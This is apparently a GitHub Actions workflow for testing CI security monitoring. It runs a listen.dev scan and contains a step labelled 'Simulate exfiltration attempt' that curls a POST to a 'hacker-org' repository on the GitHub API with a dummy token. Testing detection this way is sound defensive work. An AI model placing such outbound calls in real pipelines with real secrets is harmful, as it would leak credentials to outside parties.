name: "Hosted: HTTPS Monitoring with Harden-Runner"
on:
  workflow_dispatch:
  pull_request:
    branches:
      - main

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3

      - name: listen.dev Scan
        uses: listendev/action@v0.8.0
        with:
          ci: true
          jwt: ${{ secrets.LSTN_JWT }}


      - uses: JasonEtco/create-an-issue@v2
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

      - name: Simulate exfiltration attempt
        run: |
          curl -X POST -H "Authorization: token 123" \
          -H "Accept: application/vnd.github.v3+json" \
          https://api.github.com/repos/hacker-org/test-repo/issues \
          -d '{"title":"Issue Title","body":"Issue description goes here."}'
